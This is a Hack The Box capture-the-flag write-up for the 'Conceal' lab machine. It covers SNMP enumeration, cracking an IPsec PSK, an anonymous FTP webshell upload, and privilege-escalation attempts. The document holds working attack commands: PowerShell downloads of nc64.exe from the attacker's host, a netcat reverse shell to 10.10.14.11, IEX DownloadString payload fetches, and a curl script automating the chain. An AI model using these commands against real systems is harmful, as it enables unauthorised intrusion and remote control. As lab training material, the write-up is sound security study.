Conceal - Hack The Box

Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.
hackthebox
Author

0xPThree

Published

March 24, 2021


   ██╗   ██╗███████╗███████╗██████╗
   ██║   ██║██╔════╝██╔════╝██╔══██╗
   ██║   ██║███████╗█████╗  ██████╔╝
   ██║   ██║╚════██║██╔══╝  ██╔══██╗
   ╚██████╔╝███████║███████╗██║  ██║
    ╚═════╝ ╚══════╝╚══════╝╚═╝  ╚═╝

1. Normal nmap scans finds nothing, even flag -p- doesn't find anything. Instead we go for UDP;

[root:/git/htb/conceal]# nmap -sU -sV --version-intensity 0 -F -n 10.10.10.116
PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server (public)
500/udp open  isakmp?
Service Info: Host: Conceal


2. With SNMP found, we can try to enumerate by guessing the community string is set to 'public', using snmp-check.

[root:/git/htb/conceal]# snmp-check 10.10.10.116 -p 161 -c public                                                                 (master✱)
  snmp-check v1.9 - SNMP enumerator

  [+] Try to connect to 10.10.10.116:161 using SNMPv1 and community 'public'
    Host IP address               : 10.10.10.116
    Hostname                      : Conceal
    Description                   : Hardware: AMD64 Family 23 Model 1 Stepping 2 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)
    Contact                       : IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43
    Location                      : -
    Uptime snmp                   : 02:56:40.59
    Uptime system                 : 02:56:27.05
    System date                   : 2021-3-23 12:37:35.9
    Domain                        : WORKGROUP

  [*] User accounts:
    Guest
    Destitute
    Administrator
    DefaultAccount

  [*] TCP connections and listening ports:
    Local address         Local port            Remote address        Remote port           State
    0.0.0.0               21                    0.0.0.0               0                     listen
    0.0.0.0               80                    0.0.0.0               0                     listen
    0.0.0.0               135                   0.0.0.0               0                     listen
    0.0.0.0               445                   0.0.0.0               0                     listen
    0.0.0.0               49664                 0.0.0.0               0                     listen
    0.0.0.0               49665                 0.0.0.0               0                     listen
    0.0.0.0               49666                 0.0.0.0               0                     listen
    0.0.0.0               49667                 0.0.0.0               0                     listen
    0.0.0.0               49668                 0.0.0.0               0                     listen
    0.0.0.0               49669                 0.0.0.0               0                     listen
    0.0.0.0               49670                 0.0.0.0               0                     listen
    10.10.10.116          139                   0.0.0.0               0                     listen

  [*] Listening UDP ports:
    Local address         Local port
    0.0.0.0               123
    0.0.0.0               161
    0.0.0.0               500
    0.0.0.0               4500
    0.0.0.0               5050
    0.0.0.0               5353
    0.0.0.0               5355
    0.0.0.0               62345
    10.10.10.116          137
    10.10.10.116          138
    10.10.10.116          1900
    10.10.10.116          50998
    127.0.0.1             1900
    127.0.0.1             50999

  [*] Processes:
    Id                    Status                Name                  Path                  Parameters
    1                     running               System Idle Process
    4                     running               System
    60                    running               svchost.exe           C:\Windows\System32\  -k NetworkService
    68                    running               svchost.exe           C:\Windows\System32\  -k LocalSystemNetworkRestricted
    288                   running               smss.exe
    328                   running               svchost.exe           C:\Windows\system32\  -k LocalService
    380                   running               csrss.exe
    464                   running               wininit.exe
    472                   running               csrss.exe
    528                   running               winlogon.exe
    608                   running               services.exe
    616                   running               lsass.exe             C:\Windows\system32\
    668                   running               svchost.exe           C:\Windows\system32\  -k LocalServiceNoNetwork
    704                   running               svchost.exe           C:\Windows\system32\  -k DcomLaunch
    732                   running               fontdrvhost.exe
    736                   running               fontdrvhost.exe
    828                   running               svchost.exe           C:\Windows\system32\  -k RPCSS
    920                   running               dwm.exe
    944                   running               svchost.exe           C:\Windows\system32\  -k netsvcs
    980                   running               svchost.exe           C:\Windows\System32\  -k LocalServiceNetworkRestricted
    1116                  running               vmacthlp.exe          C:\Program Files\VMware\VMware Tools\
    1212                  running               Memory Compression
    1348                  running               svchost.exe           C:\Windows\System32\  -k LocalServiceNetworkRestricted
    1420                  running               svchost.exe           C:\Windows\System32\  -k LocalServiceNetworkRestricted
    1436                  running               svchost.exe           C:\Windows\system32\  -k LocalServiceNetworkRestricted
    1504                  running               spoolsv.exe           C:\Windows\System32\
    1672                  running               svchost.exe           C:\Windows\system32\  -k appmodel
    1688                  running               LogonUI.exe                                 /flags:0x0 /state0:0xa3a9a055 /state1:0x41c64e6d
    1700                  running               svchost.exe           C:\Windows\system32\  -k apphost
    1720                  running               svchost.exe           C:\Windows\System32\  -k utcsvc
    1736                  running               svchost.exe           C:\Windows\system32\  -k ftpsvc
    1816                  running               SecurityHealthService.exe
    1828                  running               snmp.exe              C:\Windows\System32\
    1892                  running               svchost.exe           C:\Windows\system32\  -k iissvcs
    1928                  running               MsMpEng.exe
    1936                  running               VGAuthService.exe     C:\Program Files\VMware\VMware Tools\VMware VGAuth\
    1952                  running               vmtoolsd.exe          C:\Program Files\VMware\VMware Tools\
    2000                  running               ManagementAgentHost.exe  C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\
    2628                  running               svchost.exe           C:\Windows\system32\  -k NetworkServiceNetworkRestricted
    2768                  running               SearchIndexer.exe     C:\Windows\system32\  /Embedding
    2896                  running               WmiPrvSE.exe          C:\Windows\system32\wbem\
    3036                  running               dllhost.exe           C:\Windows\system32\  /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
    3204                  running               msdtc.exe             C:\Windows\System32\
    3528                  running               NisSrv.exe
    3696                  running               svchost.exe           C:\Windows\system32\  -k LocalSystemNetworkRestricted
    4076                  running               svchost.exe           C:\Windows\system32\  -k LocalServiceAndNoImpersonation

We get a lot of interesting data;
- IKE VPN PSK: 9C8B1A372B1878851BE2C097031B6E43 (Dudecake1!)
- Usernames; Destitute, Administrator
- A lot of listening TCP- and UDP-ports.


3. The hash looks like md5, but trying to crack it with hashcat and wordlist rockyou.txt gives nothing.
Using hash-identifier we get the option of 'NTLM', and sure enough trying that gives us a password.

[root:/git/htb/conceal]# hash-identifier
  --- snip ---
   HASH: 9C8B1A372B1878851BE2C097031B6E43

  Possible Hashs:
  [+] MD5
  [+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

  Least Possible Hashs:
  [+] RAdmin v2.x
  [+] NTLM


[root:/git/htb/conceal]# hashcat -a0 -m1000 '9C8B1A372B1878851BE2C097031B6E43' /usr/share/wordlists/rockyou.txt
  --- snip ---
  9c8b1a372b1878851be2c097031b6e43:Dudecake1!

Using ike-scan we can verify if they're running in aggressive or main mode. If aggressive mode, we can easily
brute force the group ID, and later a password hash to gain access.

Aggressive test:
[root:/git/htb/conceal]# ike-scan -M -A 10.10.10.116 --id=test --sport=5001                                                       (master✱)
  Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

  Ending ike-scan 1.9.4: 1 hosts scanned in 2.438 seconds (0.41 hosts/sec).  0 returned handshake; 0 returned notify

Main test:
[root:/git/htb/conceal]# ike-scan -M 10.10.10.116 --sport=5001                                                          (master✱)
  Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
  10.10.10.116  Main Mode Handshake returned
    HDR=(CKY-R=f2741f0361c9dbfa)
    SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)
    VID=1e2b516905991c7d7c96fcbfb587e46100000009 (Windows-8)
    VID=4a131c81070358455c5728f20e95452f (RFC 3947 NAT-T)
    VID=90cb80913ebb696e086381b5ec427b1f (draft-ietf-ipsec-nat-t-ike-02\n)
    VID=4048b7d56ebce88525e7de7f00d6c2d3 (IKE Fragmentation)
    VID=fb1de3cdf341b7ea16b7e5be0855f120 (MS-Negotiation Discovery Capable)
    VID=e3a5966a76379fe707228231e5ce8652 (IKE CGA version 1)

  Ending ike-scan 1.9.4: 1 hosts scanned in 0.064 seconds (15.72 hosts/sec).  1 returned handshake; 0 returned notify

However they are running main mode, making it all that much harder.


4. With the information we have gathered, configure strongswan to setup our IPSec connection.

Edit '/etc/ipsec.secrets' and add the PSK at the bottom;
[root:/git/htb/conceal]# cat /etc/ipsec.secrets                                                                                   (master✱)
  --- snip ---
  10.10.10.116 : PSK "Dudecake1!"

Setup a new connection in '/etc/ipsec.conf';
[root:/git/htb/conceal]# cat /etc/ipsec.conf                                                                                      (master✱)
  --- snip ---
  conn Conceal
    type=transport
    auto=start
    keyexchange=ikev1
    authby=psk
    right=10.10.10.116
    ike=3des-sha1-modp1024
    esp=3des-sha1
    rightprotoport=tcp
    leftprotoport=tcp

[root:/git/htb/conceal]# ipsec start                                                                                              (master✱)
  Starting strongSwan 5.9.1 IPsec [starter]...
[root:/git/htb/conceal]# ipsec status                                                                                             (master✱)
  Security Associations (1 up, 0 connecting):
       Conceal[1]: ESTABLISHED 4 seconds ago, 10.10.14.11[10.10.14.11]...10.10.10.116[10.10.10.116]
       Conceal{1}:  INSTALLED, TRANSPORT, reqid 1, ESP SPIs: cddc16ac_i 19a4e0d0_o
       Conceal{1}:   10.10.14.11/32 === 10.10.10.116/32[tcp]

NOTE: Troubleshooting can be done by adding the --nofork flag, ex. 'ipsec start --nofork'


5. Now when connected, we can scan the device and get a satisfactory result. We found all open TCP ports earlier using
smnp-check, scan them again with nmap (flag -sT needed else everything shows as filtered).

[root:/opt/ikeforce]# nmap -sT -sVC 10.10.10.116 -p21,80,135,445,49664,49665,49666,49667,49668,49669,49670,139                     (master)
  PORT      STATE SERVICE       VERSION
  21/tcp    open  ftp           Microsoft ftpd
  |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
  | ftp-syst:
  |_  SYST: Windows_NT
  80/tcp    open  http          Microsoft IIS httpd 10.0
  | http-methods:
  |_  Potentially risky methods: TRACE
  |_http-server-header: Microsoft-IIS/10.0
  |_http-title: IIS Windows
  135/tcp   open  msrpc         Microsoft Windows RPC
  139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
  445/tcp   open  microsoft-ds?
  49664/tcp open  msrpc         Microsoft Windows RPC
  49665/tcp open  msrpc         Microsoft Windows RPC
  49666/tcp open  msrpc         Microsoft Windows RPC
  49667/tcp open  msrpc         Microsoft Windows RPC
  49668/tcp open  msrpc         Microsoft Windows RPC
  49669/tcp open  msrpc         Microsoft Windows RPC
  49670/tcp open  msrpc         Microsoft Windows RPC
  Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

  Host script results:
  |_clock-skew: 6m23s
  | smb2-security-mode:
  |   2.02:
  |_    Message signing enabled but not required
  | smb2-time:
  |   date: 2021-03-23T15:23:09
  |_  start_date: 2021-03-23T09:41:08

DIRB:
  ---- Scanning URL: http://10.10.10.116/ ----
  ==> DIRECTORY: http://10.10.10.116/upload/


6. We got anonymous login to the FTP server, and can put files on the share. From dirb we found a 'upload' directory,
meaning we can probably upload a shell on the FTP-server, and trigger it through the URL.

Seems like we can upload most files, however file bigger then 1100 seem to get stuck in upload.
None of .aspx, .php, .py, .war, .exe, .jsp seem to work. I went with a minimal (size 1099) .asp webshell that worked.

From the webshell we can grab user.txt (called proof.txt in this box)

ftp> open 10.10.10.116
  Connected to 10.10.10.116.
  220 Microsoft FTP Service
  Name (10.10.10.116:root): anonymous
  331 Anonymous access allowed, send identity (e-mail name) as password.
  Password:
  230 User logged in.
  Remote system type is Windows_NT.
ftp> put webshell.asp

Browse: http://10.10.10.116/upload/webshell.asp

Enter: type C:\Users\Destitute\Desktop\proof.txt
or
URL: http://10.10.10.116/upload/webshell.asp?cmd=type+C%3A%5CUsers%5CDestitute%5CDesktop%5Cproof.txt

The server's local address:
10.10.10.116 6E9FDFE0DCB66E700FB9CB824AE5A6FF


██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████

   ██████╗  ██████╗  ██████╗ ████████╗
   ██╔══██╗██╔═══██╗██╔═══██╗╚══██╔══╝
   ██████╔╝██║   ██║██║   ██║   ██║
   ██╔══██╗██║   ██║██║   ██║   ██║
   ██║  ██║╚██████╔╝╚██████╔╝   ██║
   ╚═╝  ╚═╝ ╚═════╝  ╚═════╝    ╚═╝


1. To get a reverse shell has been very very annoying. I tried everything from one-liners to trigger powershell scripts
over a python3 hosted http.server, trigger executables over smb and more - but all failed, even though the victim
fetched the vulnerable file/scripts.

The solution was primal:
  a. Setup local python3 http.server in a directory containing nc64.exe
  b. Setup your nc listener
  c. Upload a webshell through the anonymous FTP
  d. Quickly create C:\tmp before webshell is deleted
  e. Quickly upload nc64.exe to C:\tmp
  f. Even faster execute a reverse connection from C:\tmp\nc64.exe before BOTH webshell and nc64.exe is deleted
  g. Grab shell and profit

WEBSHELL: mkdir C:\tmp

[root:/opt/shells/asp]# python3 -m http.server 8080
  Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
  10.10.10.116 - - [24/Mar/2021 12:23:48] "GET /nc64.exe HTTP/1.1" 200 -

WEBSHELL: powershell Invoke-WebRequest -Uri "http://10.10.14.11:8080/nc64.exe" -OutFile "C:\tmp\nc64.exe"
WEBSHELL: powershell -c "C:\tmp\nc64.exe 10.10.14.11 4488 -c cmd"

[root:/git/htb/conceal]# nc -lvnp 4488                                                                                            (master✱)
  listening on [any] 4488 ...
  connect to [10.10.14.11] from (UNKNOWN) [10.10.10.116] 49705
  Microsoft Windows [Version 10.0.15063]
  (c) 2017 Microsoft Corporation. All rights reserved.

  C:\Windows\SysWOW64\inetsrv>


This whole process can also be automated if one would want to make a script. For this I made a real quick and dirty
bash script, curl-rev.sh, as a poc.

[root:/git/htb/conceal]# cat curl-rev.sh                                                                                          (master✱)
  #!/bin/bash

  ### IMPORTANT! ###
  # Before you run the script, make sure to setup:
  # python -m http.server 8080 (in a folder where nc64.exe exists)
  # rlwrap nc -lvnp 4488

  # Upload Webshell
  curl --user anonymous:anonymous --upload-file /opt/shells/asp/webshell.asp ftp://conceal.htb/

  # Upload nc64.exe and executes reverse:
  # mkdir C:\tmp
  # powershell Invoke-WebRequest -Uri "http://10.10.14.11:8080/nc64.exe" -OutFile "C:\tmp\nc64.exe"
  # C:\tmp\nc64.exe 10.10.14.11 4488 -e cmd
  curl http://conceal.htb/upload/webshell.asp\?cmd\=mkdir%20C%3A%5Ctmp
  curl http://conceal.htb/upload/webshell.asp\?cmd\=powershell%20Invoke-WebRequest%20-Uri%20%22http%3A%2F%2F10.10.14.11%3A8080%2Fnc64.exe%22%20-OutFile%20%22C%3A%5Ctmp%5Cnc64.exe%22
  sleep 1
  curl http://conceal.htb/upload/webshell.asp\?cmd\=C%3A%5Ctmp%5Cnc64.exe%2010.10.14.11%204488%20-e%20cmd
  echo "done!"


2. Enumerate the box! Look a groups, privs, and see if there are any obviously suspicious files.

C:\tmp>whoami /all
  --- snip ---
  Everyone                             Well-known group S-1-1-0                                                                                          Mandatory group, Enabled by default, Enabled group
  BUILTIN\Users                        Alias            S-1-5-32-545                                                                                     Mandatory group, Enabled by default, Enabled group
  NT AUTHORITY\BATCH                   Well-known group S-1-5-3                                                                                          Mandatory group, Enabled by default, Enabled group
  CONSOLE LOGON                        Well-known group S-1-2-1                                                                                          Mandatory group, Enabled by default, Enabled group
  NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11                                                                                         Mandatory group, Enabled by default, Enabled group
  NT AUTHORITY\This Organization       Well-known group S-1-5-15                                                                                         Mandatory group, Enabled by default, Enabled group
  NT AUTHORITY\Local account           Well-known group S-1-5-113                                                                                        Mandatory group, Enabled by default, Enabled group
  BUILTIN\IIS_IUSRS                    Alias            S-1-5-32-568                                                                                     Mandatory group, Enabled by default, Enabled group
  LOCAL                                Well-known group S-1-2-0                                                                                          Mandatory group, Enabled by default, Enabled group
  IIS APPPOOL\DefaultAppPool           Well-known group S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415                                    Mandatory group, Enabled by default, Enabled group
  NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10                                                                                      Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-4028125388-2803578072-1053907958-341417128-2434011155-477421480-740873757-3973419746    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-2745667521-2937320506-1424439867-4164262144-2333007343-2599685697-2993844191-2003921822 Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-1034403361-4122601751-838272506-684212390-1217345422-475792769-1698384238-1075311541    Mandatory group, Enabled by default, Enabled group
  Mandatory Label\High Mandatory Level Label            S-1-16-12288

  --- snip ---
  Privilege Name                Description                               State
  ============================= ========================================= ========
  SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
  SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
  SeShutdownPrivilege           Shut down the system                      Disabled
  SeAuditPrivilege              Generate security audits                  Disabled
  SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
  SeUndockPrivilege             Remove computer from docking station      Disabled
  SeImpersonatePrivilege        Impersonate a client after authentication Enabled
  SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
  SeTimeZonePrivilege           Change the time zone                      Disabled

Groups looks pretty normal, nothing really going on there.
We can see from the privs that we have 'SeImpersonatePrivilege', maybe we can use JuicyPotato?


3. Trying to execute JuicyPotato unfortunately locally and remotely triggers the AV;
C:\Users\Destitute\Documents> powershell Invoke-WebRequest -Uri "http://10.10.14.11:8080/JuicyPotato.exe" -OutFile jp.exe
C:\Users\Destitute\Documents> powershell -c "C:\Users\Destitute\Documents\jp.exe -l 1444 -p c:\tmp\nc64.exe -a "10.10.14.11 4499 -e cmd" -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}"
  --- snip ---
  Program 'jp.exe' failed to run: Operation did not complete successfully because the file contains a virus or
  potentially unwanted software

We can't even setup a new reverse Powershell shell with Nishang's Invoke-PowerShellTcp without the AV complaining;
C:\Users\Destitute\Documents> powershell -c IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.11:8080/Invoke-PowerShellTcp.ps1')
  --- snip ---
  This script contains malicious content and has been blocked by your antivirus software.


Seems like we need to look for another privesc.


4. Grab systeminfo and throw it to windows-exploit-suggester.

[root:/git/htb/conceal]# python /opt/windows-exploit-suggester.py --update                                                        (master✱)
[root:/git/htb/conceal]# python /opt/windows-exploit-suggester.py --database 2021-03-25-mssb.xls --systeminfo systeminfo.txt
  [*] initiating winsploit version 3.3...
  [*] database file detected as xls or xlsx based on extension
  [*] attempting to read from the systeminfo input file
  [+] systeminfo input file read successfully (ascii)
  [*] querying database file for potential vulnerabilities
  [*] comparing the 0 hotfix(es) against the 160 potential bulletins(s) with a database of 137 known exploits
  [*] there are now 160 remaining vulns
  [+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
  [+] windows version identified as 'Windows 10 64-bit'
  [*]
  [E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
  [*]   https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
  [*]   https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
  [*]   https://github.com/tinysec/public/tree/master/CVE-2016-7255
  [*]
  [E] MS16-129: Cumulative Security Update for Microsoft Edge (3199057) - Critical
  [*]   https://www.exploit-db.com/exploits/40990/ -- Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution
  [*]   https://github.com/theori-io/chakra-2016-11
  [*]
  [E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
  [*]   https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
  [*]
  [M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
  [*]   https://github.com/foxglovesec/RottenPotato
  [*]   https://github.com/Kevin-Robertson/Tater
  [*]   https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
  [*]   https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
  [*]
  [E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
  [*]   https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC
  [*]   https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC
  [*]
  [E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
  [*]   https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC
  [*]
  [E] MS16-056: Security Update for Windows Journal (3156761) - Critical
  [*]   https://www.exploit-db.com/exploits/40881/ -- Microsoft Internet Explorer - jscript9 Java­Script­Stack­Walker Memory Corruption (MS15-056)
  [*]   http://blog.skylined.nl/20161206001.html -- MSIE jscript9 Java­Script­Stack­Walker memory corruption
  [*]
  [E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
  [*]   https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF
  [*]   https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC
  [*]   https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC
  [*]   https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)
  [*]
  [M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
  [*]   https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF
  [*]   https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC
  [*]   https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC
  [*]
  [E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
  [*]   Windows 7 SP1 x86 - Privilege Escalation (MS16-014), https://www.exploit-db.com/exploits/40039/, PoC
  [*]
  [E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
  [*]   https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC
  [*]   https://www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007), PoC
  [*]
  [E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important
  [*]   https://www.exploit-db.com/exploits/38968/ -- Microsoft Office / COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132), PoC
  [*]   https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object els.dll DLL Planting (MS15-134), PoC
  [*]
  [E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical
  [*]   https://www.exploit-db.com/exploits/39698/ -- Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)
  [*]
  [E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important
  [*]   https://www.exploit-db.com/exploits/38474/ -- Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111), PoC
  [*]
  [E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important
  [*]   https://www.exploit-db.com/exploits/38202/ -- Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation, PoC
  [*]   https://www.exploit-db.com/exploits/38200/ -- Windows Task Scheduler DeleteExpiredTaskAfter File Deletion Privilege Escalation, PoC
  [*]   https://www.exploit-db.com/exploits/38201/ -- Windows CreateObjectTask TileUserBroker Privilege Escalation, PoC
  [*]
  [E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical
  [*]   https://www.exploit-db.com/exploits/38198/ -- Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation, PoC
  [*]   https://www.exploit-db.com/exploits/38199/ -- Windows NtUserGetClipboardAccessToken Token Leak, PoC
  [*]
  [*] done


MS16-135:
C:\Users\Destitute\Documents> powershell -c IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.11:8080/MS16-135.ps1')
  --- snip ---
  This script contains malicious content and has been blocked by your antivirus software.

C:\Users\Destitute\Documents> //10.10.14.11/share/41015.exe
  The request is not supported.


MS16-032:
Opens a new console, so only applicable when you have a RDP session.

MS16-016:
Opens a new console, so only applicable when you have a RDP session.


None of the above exploits seem to work. Out of frustration I went ahead an looked on a walkthrough, and sure enough
JuicyPotato was the way to root. Since we can't get it to work, here's the free root.txt:

5737DD2EDC29B5B219BC43E60866BE08


██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████

   ██╗███╗   ██╗███████╗ ██████╗ ██████╗ ███╗   ███╗ █████╗ ████████╗██╗ ██████╗ ███╗   ██╗
   ██║████╗  ██║██╔════╝██╔═══██╗██╔══██╗████╗ ████║██╔══██╗╚══██╔══╝██║██╔═══██╗████╗  ██║
   ██║██╔██╗ ██║█████╗  ██║   ██║██████╔╝██╔████╔██║███████║   ██║   ██║██║   ██║██╔██╗ ██║
   ██║██║╚██╗██║██╔══╝  ██║   ██║██╔══██╗██║╚██╔╝██║██╔══██║   ██║   ██║██║   ██║██║╚██╗██║
   ██║██║ ╚████║██║     ╚██████╔╝██║  ██║██║ ╚═╝ ██║██║  ██║   ██║   ██║╚██████╔╝██║ ╚████║
   ╚═╝╚═╝  ╚═══╝╚═╝      ╚═════╝ ╚═╝  ╚═╝╚═╝     ╚═╝╚═╝  ╚═╝   ╚═╝   ╚═╝ ╚═════╝ ╚═╝  ╚═══╝

SNMP Enum:
  https://book.hacktricks.xyz/pentesting/pentesting-snmp#enumerating-snmp

IKE Enum:
  https://book.hacktricks.xyz/pentesting/ipsec-ike-vpn-pentesting

Strongswan:
  https://wiki.strongswan.org/projects/strongswan/wiki/ConnSection
  https://blog.ruanbekker.com/blog/2018/02/11/setup-a-site-to-site-ipsec-vpn-with-strongswan-and-preshared-key-authentication/

ASP Webshell:
  https://github.com/tennc/webshell/blob/master/asp/webshell.asp

Powershell Reverse:
  https://github.com/samratashok/nishang/tree/master/Shells

JuicyPotato CLSID:
  http://ohpe.it/juicy-potato/CLSID/Windows_10_Enterprise/